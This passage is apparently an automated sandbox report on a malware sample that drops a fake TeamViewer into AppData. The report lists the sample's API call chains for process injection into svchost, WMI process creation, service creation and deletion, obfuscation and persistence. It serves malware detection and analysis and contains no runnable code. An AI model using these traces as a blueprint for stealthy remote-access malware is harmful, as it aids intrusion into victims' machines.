loseHandle, 6_2_6F338510
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_6F33AD39 NtProtectVirtualMemory, 6_2_6F33AD39
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_6F33A500 NtQueryVirtualMemory, 6_2_6F33A500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_6F332750 GetFileAttributesA,GetProcessHeap,GetProcessHeap,HeapAlloc,wsprintfA,RtlZeroMemory,RtlZeroMemory,CreateProcessA,NtGetContextThread,NtSetContextThread,NtResumeThread,NtTerminateProcess,CloseHandle,CloseHandle,CloseHandle,GetProcessHeap,HeapFree, 6_2_6F332750
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_6F336D50 RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageA,KillTimer,RtlZeroMemory,wsprintfW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrTrimA,GetDlgItemTextA,VirtualFree,WritePrivateProfileStringA,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,SetEvent,SetTimer,DispatchMessageA,GetMessageA,KillTimer,VirtualFree, 6_2_6F336D50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_6F3323B0 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetCommandLineA,lstrcmpiA,lstrcmpiA,StrRChrA,wsprintfA,OpenEventA,CreateEventA,RtlZeroMemory,CreateThread,NtTerminateThread,CloseHandle,VirtualFree,CloseHandle,CloseHandle,LocalFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,ExitProcess, 6_2_6F3323B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_6F337790 PostThreadMessageA,WaitForSingleObject,NtTerminateThread,CloseHandle,PostQuitMessage,PostMessageA,CreateThread,CallWindowProcW, 6_2_6F337790
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_6F3319F0 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory,GetProcessHeap,HeapFree, 6_2_6F3319F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_6F33B1F0 NtSuspendThread,NtClose, 6_2_6F33B1F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_6F33ADE0 NtProtectVirtualMemory, 6_2_6F33ADE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_6F33AFC0 NtGetContextThread,NtSetContextThread, 6_2_6F33AFC0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_6F33AE20 NtOpenThread, 6_2_6F33AE20
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_6F338400 NtQuerySystemInformation,RtlZeroMemory,NtQueryVirtualMemory,RtlCompareMemory,NtWriteVirtualMemory,NtFlushInstructionCache, 6_2_6F338400
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_6F331C00 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory, 6_2_6F331C00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_6F33B270 NtResumeThread,NtClose,HeapFree, 6_2_6F33B270
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_6F332640 RtlZeroMemory,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,RtlMoveMemory,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose, 6_2_6F332640
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_6F33B0A0 NtQuerySystemInformation,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,VirtualFree, 6_2_6F33B0A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_6F334EF0 RtlZeroMemory,RtlZeroMemory,CreateProcessA,WaitForSingleObject,GetExitCodeProcess,NtTerminateProcess,CloseHandle,CloseHandle,CloseHandle, 6_2_6F334EF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_6F3314E0 NtAllocateVirtualMemory,NtAllocateVirtualMemory, 6_2_6F3314E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_6F33B2D0 RtlMoveMemory,NtFlushInstructionCache, 6_2_6F33B2D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_6F332ED0 CreatePipe,RtlZeroMemory,RtlZeroMemory,CreateProcessA,CloseHandle,CloseHandle,GetProcessHeap,HeapAlloc,GetTickCount,ReadFile,MultiByteToWideChar,GetProcessHeap,HeapAlloc,MultiByteToWideChar,WideCharToMultiByte,GetProcessHeap,HeapAlloc,WideCharToMultiByte,GetProcessHeap,HeapFree,GetTickCount,ReadFile,GetProcessHeap,HeapReAlloc,GetProcessHeap,HeapFree,NtTerminateProcess,GetProcessHeap,HeapFree,CloseHandle,CloseHandle,CloseHandle,CloseHandle, 6_2_6F332ED0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_6F3318D0 NtProtectVirtualMemory, 6_2_6F3318D0
PE file does not import any functions
Source: Teamviewer_Resource_ja.dll.1.dr Static PE information: No import functions for PE file found
Sample file is different than original file name gathered from version info
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameTeamViewer.exel& vs 77Etc0bR2v.exe
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameTeamViewer_Resource.dll\ vs 77Etc0bR2v.exe
PE file contains strange resources
Source: 77Etc0bR2v.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: TeamViewer.exe.1.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: TeamViewer.exe.1.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.1.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.1.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.1.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.1.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.1.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.1.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.1.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.1.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.1.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.1.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.1.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Contains functionality to delete services
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 2_2_6F333700 OpenSCManagerA,OpenSCManagerA,OpenSCManagerA,OpenServiceA,QueryServiceStatus,ControlService,Sleep,QueryServiceStatus,Sleep,DeleteService,CloseServiceHandle,CloseServiceHandle, 2_2_6F333700
Source: 77Etc0bR2v.exe Virustotal: Detection: 37%
Source: 77Etc0bR2v.exe ReversingLabs: Detection: 37%
Source: C:\Users\user\Desktop\77Etc0bR2v.exe File read: C:\Users\user\Desktop\77Etc0bR2v.exe Jump to behavior
Source: 77Etc0bR2v.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\77Etc0bR2v.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown Process created: C:\Users\user\Desktop\77Etc0bR2v.exe 'C:\Users\user\Desktop\77Etc0bR2v.exe'
Source: C:\Users\user\Desktop\77Etc0bR2v.exe Process created: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe 'C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe' f
Source: unknown Process created: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown Process created: C:\Windows\SysWOW64\svchost.exe c:\windows\syswow64\svchost.exe -k 'usbportsmanagergrp' -svcr 'teamviewer.exe' -s USBManager
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown Process created: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe 'C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe' f
Source: unknown Process created: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe 'C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe' f
Source: unknown Process created: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown Process created: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Users\user\Desktop\77Etc0bR2v.exe Process created: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe 'C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe' f Jump to behavior
Source: C:\Users\user\Desktop\77Etc0bR2v.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32 Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 2_2_6F335B40 GetProcessHeap,HeapFree,CharLowerA,GetProcessHeap,HeapAlloc,lstrlenA,RtlComputeCrc32,Sleep,Sleep,GetDlgItem,PostMessageA,PostMessageA,PostMessageA,Sleep,Sleep,PostMessageA,Sleep,GetTickCount,RtlRandom,wsprintfA,wsprintfA,GetFileAttributesA,DeleteFileA,wsprintfA,ExpandEnvironmentStringsA,PathIsRelativeA,wsprintfA,StrRChrA,SHCreateDirectoryExA,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,wsprintfA,wsprintfA,DeleteFileA,GetTickCount,RtlRandom,wsprintfA,WritePrivateProfileStringA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,LocalFree,HeapFree,GetProcessHeap,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 2_2_6F335B40
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_004C6E36 AdjustTokenPrivileges, 3_2_004C6E36
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6F335B40 GetProcessHeap,HeapFree,CharLowerA,GetProcessHeap,HeapAlloc,lstrlenA,RtlComputeCrc32,Sleep,Sleep,GetDlgItem,PostMessageA,PostMessageA,PostMessageA,Sleep,Sleep,PostMessageA,Sleep,GetTickCount,RtlRandom,wsprintfA,wsprintfA,GetFileAttributesA,DeleteFileA,wsprintfA,ExpandEnvironmentStringsA,PathIsRelativeA,wsprintfA,StrRChrA,SHCreateDirectoryExA,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,wsprintfA,wsprintfA,DeleteFileA,GetTickCount,RtlRandom,wsprintfA,WritePrivateProfileStringA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,LocalFree,HeapFree,GetProcessHeap,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 3_2_6F335B40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_6F335B40 GetProcessHeap,HeapFree,CharLowerA,GetProcessHeap,HeapAlloc,lstrlenA,RtlComputeCrc32,Sleep,Sleep,GetDlgItem,PostMessageA,PostMessageA,PostMessageA,Sleep,Sleep,PostMessageA,Sleep,GetTickCount,RtlRandom,wsprintfA,wsprintfA,GetFileAttributesA,DeleteFileA,wsprintfA,ExpandEnvironmentStringsA,PathIsRelativeA,wsprintfA,StrRChrA,SHCreateDirectoryExA,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,wsprintfA,wsprintfA,DeleteFileA,GetTickCount,RtlRandom,wsprintfA,WritePrivateProfileStringA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,LocalFree,HeapFree,GetProcessHeap,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 6_2_6F335B40
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe WMI Queries: IWbemServices::ExecMethod - Root\Cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe WMI Queries: IWbemServices::ExecMethod - Root\Cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe WMI Queries: IWbemServices::ExecMethod - Root\Cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\77Etc0bR2v.exe File created: C:\Users\user\AppData\Roaming\TeamViewer Jump to behavior
Source: C:\Users\user\Desktop\77Etc0bR2v.exe File created: C:\Users\user\AppData\Local\Temp\nso5B2E.tmp Jump to behavior
Source: nso5B2F.tmp.1.dr Binary string: Driver.GetDriverIPAddress.GetAdaptersInfo2.Error = Driver.GetDriverIPAddress.Memory allocation errorDriver.GetDriverIPAddress.GetAdaptersInfo.Error = Driver.NoSubkeys DriverConnector.GetGUIDfromRegistry: RegCloseKey(unit_key) failed with error DriverConnector.GetGUIDfromRegistry: RegQueryValueEx(component_id_string) failed with error DriverConnector.GetGUIDfromRegistry: RegQueryValueEx(net_cfg_instance_id_string) failed with error DriverConnector.GetGUIDfromRegistry: RegCloseKey(adapter_key) failed with error Driver.KeyError ComponentIdDriver.NoRegKey SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}DriverConnector.RemoveIPAddresses: DeleteIPAddress() failed with error DriverConnector.Close: CloseHandle failed\DEVICE\TCPIP_CDriverConnector::Init() GetIndex failed DriverConnector.Init: GetGUIDfromRegistry failedDriverConnector.Open: FlushIpNetTable failed with error DriverConnector.Open: IpRenewAddress failed with error Driver.Invalid.IPDriver.TAP_IOCTL_SET_MEDIA_STATUS.RejectedDriver.GetMAC.FailedDriver.DHCP.Failed1.0.0.7255.0.0.0DriverConnector.Open: DeviceIOControl(MTU) failedDriverConnector.Open: CreateFile failed with error \\.\Global\.dgt
Source: classification engine Classification label: mal76.evad.winEXE@14/11@4/4
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 2_2_6F3329D0 CoInitializeEx,CoCreateInstance,SysAllocString,SysAllocString,SysFreeString,CoSetProxyBlanket,SysAllocString,SysAllocString,SysFreeString,VariantInit,VariantInit,lstrlenW,SysAllocStringLen,GetProcessHeap,HeapFree,PathQuoteSpacesW,VariantInit,SysAllocString,GetProcessHeap,HeapFree,VariantInit,SysAllocString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString, 2_2_6F3329D0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: OpenSCManagerA,OpenSCManagerA,OpenSCManagerA,OpenServiceA,wsprintfA,RegSetValueExA,wsprintfA,CreateServiceA,ChangeServiceConfig2A,wsprintfA,RegCreateKeyExA,lstrlenA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RegSetValueExA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RegSetValueExA,RegSetValueExA,lstrlenA,RegSetValueExA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,lstrlenA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RtlZeroMemory,RegQueryValueExA,lstrcmpiA,RegSetValueExA,RegCloseKey,RtlZeroMemory,QueryServiceStatusEx,CloseServiceHandle,CloseServiceHandle, 2_2_6F333C60
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: OpenSCManagerA,OpenSCManagerA,OpenSCManagerA,OpenServiceA,wsprintfA,RegSetValueExA,wsprintfA,CreateServiceA,ChangeServiceConfig2A,wsprintfA,RegCreateKeyExA,lstrlenA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RegSetValueExA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RegSetValueExA,RegSetValueExA,lstrlenA,RegSetValueExA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,lstrlenA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RtlZeroMemory,RegQueryValueExA,lstrcmpiA,RegSetValueExA,RegCloseKey,RtlZeroMemory,QueryServiceStatusEx,CloseServiceHandle,CloseServiceHandle, 3_2_6F333C60
Source: C:\Windows\SysWOW64\svchost.exe Code function: OpenSCManagerA,OpenSCManagerA,OpenSCManagerA,OpenServiceA,wsprintfA,RegSetValueExA,wsprintfA,CreateServiceA,ChangeServiceConfig2A,wsprintfA,RegCreateKeyExA,lstrlenA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RegSetValueExA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RegSetValueExA,RegSetValueExA,lstrlenA,RegSetValueExA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,lstrlenA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RtlZeroMemory,RegQueryValueExA,lstrcmpiA,RegSetValueExA,RegCloseKey,RtlZeroMemory,QueryServiceStatusEx,CloseServiceHandle,CloseServiceHandle, 6_2_6F333C60
Source: C:\Users\user\Desktop\77Etc0bR2v.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\77Etc0bR2v.exe Code function: 1_2_00404356 GetDlgItem,SetWindowTextA,SHBrowseForFolder,762AA680,lstrcmpi,lstrcat,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA, 1_2_00404356
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 2_2_6F3396D0 SwitchDesktop,SetThreadDesktop,LoadLibraryA,GetProcessHeap,HeapAlloc,GetProcessHeap,RtlZeroMemory,GetSystemDirectoryA,PathAddBackslashA,lstrcatA,LoadLibraryExA,LoadStringW,LoadStringW,LoadStringW,LoadStringW,FormatMessageW,LoadStringW,wsprintfW,FormatMessageW,FreeLibrary,wsprintfW,GetLastError,GetProcessHeap,HeapAlloc,RtlZeroMemory,RtlZeroMemory,RtlZeroMemory,RtlZeroMemory,WritePrivateProfileStringW,CoTaskMemFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FreeLibrary,Sleep,SwitchDesktop,SetThreadDesktop,Sleep, 2_2_6F3396D0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 2_2_6F3337D0 QueryServiceConfigA,QueryServiceConfigA,GetProcessHeap,HeapAlloc,QueryServiceConfigA,ChangeServiceConfigA,GetProcessHeap,HeapFree,QueryServiceStatus,StartServiceA, 2_2_6F3337D0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Mutant created: \Sessions\1\BaseNamedObjects\DynGateInstanceMutexH1
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Mutant created: \Sessions\1\BaseNamedObjects\{C15730E2-145C-4c5e-B005-3BC753F42475}-once-flagMKKJJIAAADFBAAAA
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Mutant created: \Sessions\1\BaseNamedObjects\TeamViewer3_Win32_Instance_MutexH1
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Mutant created: \Sessions\1\BaseNamedObjects\TeamViewer_Win32_Instance_MutexH1
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 2_2_6F334E50 FindResourceW,LoadResource,SizeofResource,LockResource,GetProcessHeap,HeapAlloc,RtlMoveMemory,FreeResource, 2_2_6F334E50
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe File created: C:\Program Files (x86)\QS Jump to behavior
Source: C:\Users\user\Desktop\77Etc0bR2v.exe File written: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.ini Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: 77Etc0bR2v.exe Static file information: File size 1828192 > 1048576
Source: 77Etc0bR2v.exe Static PE information: certificate valid
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TeamViewer_qs.pdb source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000000.363681783.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000000.390922597.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.460385781.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.475864917.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000002.472094268.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000000.471404886.0000000000733000.00000002.00020000.sdmp
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TeamViewer_qs.pdbPS source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000000.363681783.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000000.390922597.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.460385781.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.475864917.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000002.472094268.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000000.471404886.0000000000733000.00000002.00020000.sdmp
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TV.pdb source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp, svchost.exe, 00000006.00000002.748672807.000000006F33D000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.467680448.000000006F33D000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.479287656.000000006F33D000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000002.475980706.000000006F33D000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485151608.000000006F33D000.00000002.00020000.sdmp, nso5B2F.tmp.1.dr

Data Obfuscation:

barindex
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 2_2_6F33C101 push ecx; ret 2_2_6F33C114
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_0075C004 push ebp; retf 3_2_0075C018
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_0053E60D push ecx; ret 3_2_0053E620
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_0053BD8D push ecx; ret 3_2_0053BDA0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_0075BFE4 push ebp; retf 3_2_0075C018
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6F33C101 push ecx; ret 3_2_6F33C114
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_6F33C101 push ecx; ret 6_2_6F33C114
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 11_2_026F4DB0 push esi; ret 11_2_026F4DB1
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 12_3_02721B50 push ecx; retf 12_3_02721B3A
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 12_3_02725320 push ecx; iretd 12_3_02725322
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 12_3_02721B50 push ecx; retf 12_3_02721B3A
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 12_3_02725320 push ecx; iretd 12_3_02725322
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 12_3_026F703A push ecx; ret 12_3_026F7042
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\77Etc0bR2v.exe Code function: 1_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress, 1_2_00405E88

Persistence and Installation Behavior:

barindex
Creates processes via WMI
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe WMI Queries: IWbemServices::ExecMethod - Root\Cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe WMI Queries: IWbemServices::ExecMethod - Root\Cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe WMI Queries: IWbemServices::ExecMethod - Root\Cimv2 : Win32_Process::Create
Drops PE files
Source: C:\Users\user\Desktop\77Etc0bR2v.exe File created: C:\Users\user\AppData\Roaming\TeamViewer\Teamviewer_Resource_ja.dll Jump to dropped file
Source: C:\Users\user\Desktop\77Etc0bR2v.exe File created: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Jump to dropped file
Source: C:\Users\user\Desktop\77Etc0bR2v.exe File created: C:\Users\user\AppData\Roaming\TeamViewer\TV.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 2_2_6F3344D0 GetPrivateProfileIntA,GetProcessHeap,HeapAlloc,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,WritePrivateProfileStringA,RtlZeroMemory,SHFileOperationA,GetProcessHeap,HeapFree, 2_2_6F3344D0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_004E177C __EH_prolog3,GetModuleFileNameW,PathRemoveFileSpecW,_wcscat_s,_memset,GetPrivateProfileStringW, 3_2_004E177C
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6F3344D0 GetPrivateProfileIntA,GetProcessHeap,HeapAlloc,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,WritePrivateProfileStringA,RtlZeroMemory,SHFileOperationA,GetProcessHeap,HeapFree, 3_2_6F3344D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_6F3344D0 GetPrivateProfileIntA,GetProcessHeap,HeapAlloc,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,WritePrivateProfileStringA,RtlZeroMemory,SHFileOperationA,GetProcessHeap,HeapFree, 6_2_6F3344D0

Boot Survival:

barindex
Creates or modifies windows services
